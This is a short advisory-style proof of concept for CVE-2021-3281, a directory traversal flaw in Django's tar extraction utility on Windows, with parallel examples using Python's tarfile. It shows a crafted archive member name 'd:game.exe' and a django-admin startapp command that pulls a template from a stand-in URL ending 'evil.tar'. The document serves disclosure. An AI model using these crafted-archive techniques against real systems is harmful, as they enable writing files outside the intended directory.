
Prova de conceito para CVE-2021-3281: vulnerabilidade de travessia de diretório no utilitário TarArchive do Django por meio de arquivos tar manipulados, com demonstração do módulo tarfile Python.
Existe uma vulnerabilidade de Directory Traversal em django.utils.archive.py, linha 171, na classe TarArchive.
A chamada de função os.path.join(to_path, name) não verificava o parâmetro "name"; se alguém usar este utilitário na plataforma Windows, haverá um risco de Directory Traversal. O POC é:
from django.utils import archive
archive.extract('test.tar','.')
The test.tar include file named "d:game.exe",and the poc will create a file named "game.exe" in D://game.exe rather than "."
It looks like the Django core didn't use this util,but I still think it's a risk,maybe someone will use this util in webapp to archive somethings.``and there is another scene:``"djangoadmin startapp --template" command will use archive.py,see in https://docs.djangoproject.com/en/3.1/ref/django-admin/#s-startapp. POC is:
django-admin.exe startapp vulapp --template="C:/my_templates/test.tar"
It'll create a file named "game.exe" in D://game.exe rather than "vulapp/", It also accept URLs like "django-admin.exe startapp vulapp --template=https://xxx.com/evil.tar"
from django.utils import archive
archive.extract('test.tar','.')
Existe o mesmo problema em Python/Lib/tarfile.py:
#Lib/tarfile.py:
import tarfile
tar=tarfile.open('test.tar','r')
tar.extractall('.')
tar.close()
e a documentação dá um aviso, veja https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall